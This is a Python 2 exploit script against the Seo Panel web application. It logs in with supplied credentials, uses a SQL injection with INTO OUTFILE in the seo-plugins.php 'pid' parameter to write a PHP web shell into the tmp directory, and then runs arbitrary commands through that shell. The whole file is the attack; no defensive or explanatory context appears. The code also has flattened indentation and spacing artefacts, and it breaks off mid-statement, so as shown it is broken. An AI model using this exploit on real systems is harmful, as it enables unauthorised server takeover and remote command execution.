import sys
import urllib2
import urllib
import cookielib
def exploit(host,path,username,password):
headers = { 'Content-type' : 'application/x-www-form-urlencoded' }
payload = { 'pid' : '\' UNION/**/select/**/\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',"\<\?php system($_REQUEST[\'cmd\']);\?\>"/**/from/**/seoplugins/**/into/**/outfile/**/\'/var/www/seopanel/tmp/buckle.php' }
base_url = "http://" + host + path
post_args = { 'userName' : username, 'password' : password, 'sec' : 'login' , 'referer' :base_url, 'login' : 'Sign In >>' }
url_login = base_url + "/login.php"
url_plugins = base_url + "/seo-plugins.php"
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = urllib2.Request(url_login)
request.add_data(urllib.urlencode(post_args))
request.add_header( 'Content-type' , 'application/x-www-form-urlencoded' )
login_request = opener. open (request)
code = int (login_request.code)
if code = = 200 :
try :
opener. open (url_plugins,urllib.urlencode(payload))
except Exception, e:
if check(base_url) = = True :
print "[*] Upload was successfull!"
def shell(url,command):
url_shell = url + '/tmp/buckle.php'
encoded_args = urllib.urlencode({ 'cmd' :command})
return urllib2.urlopen(url_shell, encoded_args)
def cmd(host,path,command):
url = "http://" + host + path
print shell(url,command).read()
def check(url):
code = shell(url, "ls" ).code
if (code = = 200 ):
return True
else :
return False
if len (sys.argv) = = 6 :
if str (sys.argv[ 1 ]) = = "e" :
exploit( str (sys.argv[ 2 ]), str (sys.argv[ 3 ]), str (sys.argv[ 4 ]), str (sys.argv[ 5 ]))
if len (sys.argv) = = 5 :
if str (sys.argv[ 1 ]) = = "c" :
|